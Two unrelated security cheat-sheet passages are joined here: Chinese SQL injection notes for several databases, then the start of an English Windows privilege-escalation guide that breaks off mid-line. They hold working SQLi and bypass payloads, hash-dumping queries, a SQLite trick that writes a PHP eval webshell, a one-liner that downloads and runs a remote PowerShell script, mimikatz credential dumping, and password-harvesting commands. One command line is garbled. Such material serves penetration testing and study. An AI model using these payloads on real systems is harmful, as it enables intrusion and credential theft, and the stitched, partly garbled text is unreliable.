110) ``` **绕过字符串黑名单** ```sql SELECT 'a' 'd' 'mi' 'n'; SELECT CONCAT('a', 'd', 'm', 'i', 'n'); SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n'); SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n'); -- 使用 CONCAT() 时,任何个参数为 null,将返回 null,可以使用 CONCAT_WS()。CONCAT_WS()函数第一个参数表示用哪个字符间隔所查询的结果。 ``` **json 函数** MySQL 5.7.8 开始新增了很多操作 json 数据的函数 ```sql JSON_TYPE() -- 此函数获取JSON值的类型,当我们传入的值不属于json格式则报错。 JSON_TYPE(version()) JSON_EXTRACT() -- 此函数从 JSON 文档中返回数据,从与path参数匹配的文档部分中选择,当第一个参数不是json类型的值则报错 JSON_EXTRACT(version(), '$[1]') JSON_EXTRACT((select user()),'$.a') JSON_ARRAY_APPEND() -- 将值附加到 JSON 文档中指定数组的末尾并返回结果,报错输出原理和json_extract函数相同。 select JSON_ARRAY_APPEND(version(),1,1); select JSON_ARRAY_APPEND('[1,2]',version(),1); ``` ### 提权/GETSHELL - [Mysql提权](../../软件服务安全/实验/Mysql.md) --- ## MSSQL > 基于ASP / ASPX的应用程序一般都是 MSSQL。 **学习资源** - [aleenzz/MYSQL_SQL_BYPASS_WIKI](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI) **靶场** - [Larryxi/MSSQL-SQLi-Labs](https://github.com/Larryxi/MSSQL-SQLi-Labs) - 搭建过程 : [MSSQL搭建](../../../../Integrated/Windows/实验/MSSQL搭建.md) , [asp站点搭建](../../../../Integrated/Windows/实验/asp站点搭建.md) **相关文章** - [SQL Server从0到1](https://mp.weixin.qq.com/s/N2siXJgmPAZ7CSIQ3FCF0w) - [从0开始学习Microsoft SQL Server数据库攻防](https://xz.aliyun.com/t/10955) - [窃取MSSQL各版本密码HASH](https://mp.weixin.qq.com/s/nKV25G2PAI9rxXdtbyWE3A) **相关案例** - [记一次苦逼的sql注入](https://mp.weixin.qq.com/s/ydzMtlJfWD4hixIo1_ul2A) **相关工具** - [Keramas/mssqli-duet](https://github.com/Keramas/mssqli-duet) - SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing ### MSSQL 基础 - [MSSQL](../../../../Integrated/数据库/笔记/MSSQL.md) **基本参数** ```sql @@version -- 数据库版本 user -- 获取当前数据库用户名 db_name() -- 当前数据库名 其中db_name(N)可以来遍历其他数据库 ;select user -- 查询是否支持多语句 @@servername -- 服务器名称 ``` **查询密码HASH** ```sql -- MSSQL 2000版本 select name,password from master.dbo.sysxlogins -- MSSQL 2005及以后版本 select name,password_hash from sys.sql_logins ``` ### 正则表达式攻击 MSSQL 所用的正则表达式并不是标准正则表达式 ,该表达式使用 like 关键词 ```sql 1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%' ) ``` 该查询语句中,select top 1 是一个组合,不要看错了。 如果要查询其它的表名,由于不能像 mysql 那样用 limit x,1,只能使用 table_name not in (select top x table_name from information_schema.tables) 意义是:表名没有在前 x 行里,其实查询的就是第 x+1 行。 例如查询第二行的表名: ```sql 1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' ) ``` 表达式的顺序: ``` 'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE ``` 之所以表达式 news[a-z] 查询后返回正确是应为 % 代表 0-n 个字符,使用 "_" 则只能代表一个字符。故确认后续是否还有字符可用如下表达式 ``` 'news%' TRUE -> 'news_' FALSE ``` 同理可以用相同的方法获取字段,值。这里就不再详细描述了。 ### bypass 技巧 **select from 后的位置** - 空白符号 ``` 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 ``` 需要做 urlencode,sqlserver 中的表示空白字符比较多,靠黑名单去阻断一般不合适. - 注释符号 Mssql 也可以使用注释符号 `/**/` - `.` 符号 - `:` 号 **select from 之间的位置** - 空白符号 - 注释符号 - `:` 号 **and 之后的位置** - 空白符号 - 注释符号 - `:` 号 - `%2b` 号 **常见过滤函数** - 字符串截取函数 ``` Substring(@@version,1,1) Left(@@version,1) Right(@@version,1) ``` - 字符串转换函数 ``` Ascii(‘a’) 这里的函数可以在括号之间添加空格的, 一些 waf 过滤不严会导致 bypass Char(‘97’) ``` - Mssql 支持多语句查询,因此可以使用;结束上面的查询语句,然后执行自己构造的语句.动态执行. 使用 exec 的方式: 使用 sp_executesql 的方式: ### 提权/GETSHELL - [MSSQL提权](../../软件服务安全/实验/MSSQL.md) --- ## oracle 用于是否是判断 oracle 数据库的方法 ``` and (select count(*) from sys.user_tables)>0 ``` **相关案例** - [BountyHunterInChina/重生之我是赏金猎人(一)-轻松GET某src soap注入](https://github.com/J0o1ey/BountyHunterInChina/blob/main/%E9%87%8D%E7%94%9F%E4%B9%8B%E6%88%91%E6%98%AF%E8%B5%8F%E9%87%91%E7%8C%8E%E4%BA%BA(%E4%B8%80)-%E8%BD%BB%E6%9D%BEGET%E6%9F%90src%20soap%E6%B3%A8%E5%85%A5.pdf) ### bypass 技巧 oracle 中文版中,中文括号 `( )`可以代理英文且不报错 ``` select (1+1) from test; ``` --- ## H2 database **相关文章** - [一步一步教你漏洞挖掘之某系统从H2 database SQL注入漏洞到RCE回显构造](https://mp.weixin.qq.com/s/fZFNj2T0IITL8-9na_AWTQ) --- ## BigQuery **相关文章** - [BigQuery SQL Injection Cheat Sheet](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) **Playground** - https://console.cloud.google.com/bigquery **信息收集** ``` SELECT * FROM INFORMATION_SCHEMA.SCHEMATA select @@project_id select session_user() ``` --- ## SQLite SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,你不需要在系统中配置。 SQLite 数据库的特点是它每一个数据库都是一个文件,当你查询表的完整信息时会得到创建表的语句。 **相关文章** - [SQLite注入](https://mp.weixin.qq.com/s/12lN4zeezSsCLYvRYJfAuw) ### SQLite 基础 - https://www.runoob.com/sqlite/sqlite-commands.html **注释** ```sql ; 注释内容,表示单行注释 -- 注意--后面有一个空格 /* */ 多行注释 ``` **查看版本** ```sql select sqlite_version(); ``` **查询表名和列名** ```sql select sql from sqlite_master ``` **布尔盲注** 布尔盲注通过查询正确和错误返回的页面不同来判断数据内容。 SQLite不支持ascii,所以直接通过字符去查询,这里和mysql不同,这个区分大小写。也没有mid,left等函数。 ```sql -1' or substr((select group_concat(sql) from sqlite_master),1,1)<'a'/* ``` **时间盲注** SQLite没有sleep()函数,但可以用randomblob(N)函数,randomblob(N) 函数,其作用是返回一个 N 字节长的包含伪随机字节的 BLOG。N 是正整数。可以用它来制造延时。SQLite没有if,所以需要使用case……when来代替。 ``` -1' or (case when(substr(sqlite_version(),1,1)>'3') then randomblob(300000000) else 0 end)/* ``` **写 webshell** SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。 ``` ATTACH DATABASE file_name AS database_name; ``` 如果附加数据库不存在,就会创建该数据库,如果数据库文件设置在web目录下,就可以写入webshell。 ``` ATTACH DATABASE '/var/www/html/shell.php' AS shell; create TABLE shell.exp (webshell text); insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>'); ``` --- ## Postgresql **相关文章** - [SQL注入渗透PostgreSQL(bypass tricks)](https://xz.aliyun.com/t/8621) ### Postgresql 基础 - [Postgresql](../../../../Integrated/数据库/笔记/Postgresql.md) **忽略** ```sql SELECT 'admin' FROM users; SELECT 'admin' OR 1 = 1; -- -' FROM users; ``` **||** `||` 可用于将数据附加到同一行的输出中 ```sql SELECT ''||password FROM users; -- -'; ``` **通过延时判断是否是 Postgresql 数据库的方法** SELECT ```sql -- 如果参数是整数: pg_sleep(20); -- - -- 如果参数是字符串: '||pg_sleep(20); -- - ``` FROM ```sql -- 当payload的第一个SELECT子句中提供了有效的表名(TABLE)和列(COLUMN)时 (SELECT * FROM [TABLE] WHERE [COLUMN]=1|(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- - -- 或者 (SELECT * FROM [TABLE] WHERE [COLUMN] = 'asd'::varchar||(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- - -- 当已知列需要一个Int (SELECT * FROM address WHERE address_id=1|(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- - -- 当已知列需要字符串时 (SELECT * FROM address WHERE address = 'asd'::varchar||(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- - ``` WHERE ```sql -- 如果参数是整数 1|(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END)); -- - -- 如果参数是字符串 '||(pg_sleep(20)); -- - ``` HAVING ```sql -- 如果参数是整数: (COUNT((SELECT pg_sleep(20)))=1); -- - -- 如果参数是字符串: t' AND (SELECT COUNT((SELECT pg_sleep(20)))) = 1; -- - ``` OFFSET ```sql -- 如果参数是整数: 1|(SELECT COUNT((SELECT pg_sleep(20)))); -- - -- 如果参数是字符串 1'::integer + 1|(SELECT COUNT((SELECT pg_sleep(20)))); -- - ``` **当注入点在 WHERE 时** 可以配合 `||` ```sql select * from test where username='admin' and password='admin' select * from test where username='admin' and password=''||(select password); ``` ### bypass 技巧 **注释** ```sql SELECT version(); SELECT/**/version(); ``` **代替引号** ```sql select pg_ls_dir('/etc'); select pg_ls_dir($$/etc$$); -- 使用 $ 符号 select pg_ls_dir($test$/etc$test$); -- 使用标签 select pg_ls_dir(CHR(47)||CHR(101)||CHR(116)||CHR(99)); -- 采取CHR()函数 ``` **query_to_xml** query_to_xml 可以将结果返回在一行里,不必担心限制或多行 ```sql SELECT query_to_xml('SELECT usename, passwd FROM pg_shadow;',true,true,'') ``` **DATABASE_TO_XML** 使用 xml 帮助程序通过单个查询转储整个数据库 ```sql SELECT database_to_xml(true,true,'') ``` ### 提权/GETSHELL - [Postgresql提权](../../软件服务安全/实验/Postgresql.md)
sec-knowleage
# Windows - Privilege Escalation ## Summary * [Tools](#tools) * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) * [Antivirus Enumeration](#antivirus-enumeration) * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [HiveNightmare](#hivenightmare) * [LAPS Settings](#laps-settings) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) * [Passwords in unattend.xml](#passwords-in-unattendxml) * [Wifi passwords](#wifi-passwords) * [Sticky Notes passwords](#sticky-notes-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Passwords stored in Key Manager](#passwords-stored-in-key-manager) * [Powershell History](#powershell-history) * [Powershell Transcript](#powershell-transcript) * [Password in Alternate Data Stream](#password-in-alternate-data-stream) * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) * [EoP - $PATH Interception](#eop---path-interception) * [EoP - Named Pipes](#eop---named-pipes) * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) * [EoP - Printers](#eop---printers) * [Universal Printer](#universal-printer) * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) * [EoP - Runas](#eop---runas) * [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) * [EoP - Privileged File Write](#eop---privileged-file-write) * [DiagHub](#diaghub) * [UsoDLLLoader](#usodllloader) * [WerTrigger](#wertrigger) * [WerMgr](#wermgr) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) * [CVE-2019-1388](#cve-2019-1388) * [EoP - $PATH Interception](#eop---path-interception) * [References](#references) ## Tools - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) ```powershell powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks ``` - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) ```powershell powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) ```powershell ./windows-exploit-suggester.py --update ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) ```powershell Seatbelt.exe -group=all -full Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" ``` - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) ```powershell powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt ``` - [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) - [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) ```powershell # First obtain systeminfo systeminfo systeminfo > systeminfo.txt # Then feed it to wesng python3 wes.py --update-wes python3 wes.py --update python3 wes.py systeminfo.txt ``` - [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck) ```powershell C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML" ``` ## Windows Version and Configuration ```powershell systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ``` Extract patchs and updates ```powershell wmic qfe ``` Architecture ```powershell wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% ``` List all env variables ```powershell set Get-ChildItem Env: | ft Key,Value ``` List all drives ```powershell wmic logicaldisk get caption || fsutil fsinfo drives wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root ``` ## User Enumeration Get current username ```powershell echo %USERNAME% || whoami $env:username ``` List user privilege ```powershell whoami /priv whoami /groups ``` List all users ```powershell net user whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name ``` List logon requirements; useable for bruteforcing ```powershell$env:usernadsc net accounts ``` Get details about a user (i.e. administrator, admin, current user) ```powershell net user administrator net user admin net user %USERNAME% ``` List all local groups ```powershell net localgroup Get-LocalGroup | ft Name ``` Get details about a group (i.e. administrators) ```powershell net localgroup administrators Get-LocalGroupMember Administrators | ft Name, PrincipalSource Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource ``` Get Domain Controllers ```powershell nltest /DCLIST:DomainName nltest /DCNAME:DomainName nltest /DSGETDC:DomainName ``` ## Network Enumeration List all network interfaces, IP, and DNS. ```powershell ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` List current routing table ```powershell route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex ``` List the ARP table ```powershell arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State ``` List all current connections ```powershell netstat -ano ``` List all network shares ```powershell net share powershell Find-DomainShare -ComputerDomain domain.local ``` SNMP Configuration ```powershell reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` ## Antivirus Enumeration Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` ## Default Writeable Folders ```powershell C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color C:\Windows\System32\spool\printers C:\Windows\System32\spool\servers C:\Windows\tracing C:\Windows\Temp C:\Users\Public C:\Windows\Tasks C:\Windows\System32\tasks C:\Windows\SysWOW64\tasks C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system C:\Windows\debug\wia C:\Windows\registration\crmlog C:\Windows\System32\com\dmp C:\Windows\SysWOW64\com\dmp C:\Windows\System32\fxstmp C:\Windows\SysWOW64\fxstmp ``` ## EoP - Looting for passwords ### SAM and SYSTEM files The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM. ```powershell # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` Generate a hash file for John using `pwdump` or `samdump2`. ```powershell pwdump SYSTEM SAM > /root/sam.txt samdump2 SYSTEM SAM -o sam.txt ``` Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash. ### HiveNightmare > CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user Check for the vulnerability using `icacls` ```powershell C:\Windows\System32> icacls config\SAM config\SAM BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! ``` Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. ```powershell mimikatz> token::whoami /full # List shadow copies available mimikatz> misc::shadowcopies # Extract account from SAM databases mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM # Extract secrets from SECURITY mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY ``` ### LAPS Settings Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. * LAPS Enabled: AdmPwdEnabled * LAPS Admin Account Name: AdminAccountName * LAPS Password Complexity: PasswordComplexity * LAPS Password Length: PasswordLength * LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled ### Search for file contents ```powershell cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt findstr /spin "password" *.* ``` Also search in remote places such as SMB Shares and SharePoint: * Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6) ```powershell # First, retrieve a token ## Method 1: using SnaffPoint binary $token = (.\GetBearerToken.exe https://your.sharepoint.com) ## Method 2: using AADInternals Install-Module AADInternals -Scope CurrentUser Import-Module AADInternals $token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com") # Second, search on Sharepoint ## Method 1: using search strings in ./presets dir .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token ## Method 2: using search string in command line ### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config" ``` * Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) ### Search for a file with a certain filename ```powershell dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` ### Search the registry for key names and passwords ```powershell REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### Passwords in unattend.xml Location of the unattend.xml files. ```powershell C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. Example content ```powershell <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64"> <AutoLogon> <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password> <Enabled>true</Enabled> <Username>Administrateur</Username> </AutoLogon> <UserAccounts> <LocalAccounts> <LocalAccount wcm:action="add"> <Password>*SENSITIVE*DATA*DELETED*</Password> <Group>administrators;users</Group> <Name>Administrateur</Name> </LocalAccount> </LocalAccounts> </UserAccounts> ``` Unattend credentials are stored in base64 and can be decoded manually with base64. ```powershell $ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d SecretSecurePassword1234* ``` The Metasploit module `post/windows/gather/enum_unattend` looks for these files. ### IIS Web config ```powershell Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` ```powershell C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config C:\inetpub\wwwroot\web.config ``` ### Other files ```bat %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts C:\ProgramData\Configs\* C:\Program Files\Windows PowerShell\* dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b ``` ### Wifi passwords Find AP SSID ```bat netsh wlan show profile ``` Get Cleartext Pass ```bat netsh wlan show profile <SSID> key=clear ``` Oneliner method to extract wifi passwords from all the access point. ```batch cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on ``` ### Sticky Notes passwords The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` ### Passwords stored in services Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher) ```powershell https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -AllDomain -o Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ### Passwords stored in Key Manager :warning: This software will display its output in a GUI ```ps1 rundll32 keymgr,KRShowKeyMgr ``` ### Powershell History Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. ```powershell type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` ### Powershell Transcript ```xml C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt ``` ### Password in Alternate Data Stream ```ps1 PS > Get-Item -path flag.txt -Stream * PS > Get-Content -path flag.txt -Stream Flag ``` ## EoP - Processes Enumeration and Tasks * What processes are running? ```powershell tasklist /v net start sc query Get-Service Get-Process Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize ``` * Which processes are running as "system" ```powershell tasklist /v /fi "username eq system" ``` * Do you have powershell magic? ```powershell REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion ``` * List installed programs ```powershell Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` * List services ```powershell net start wmic service list brief tasklist /SVC ``` * Enumerate scheduled tasks ```powershell schtasks /query /fo LIST 2>nul | findstr TaskName schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` * Startup tasks ```powershell wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start 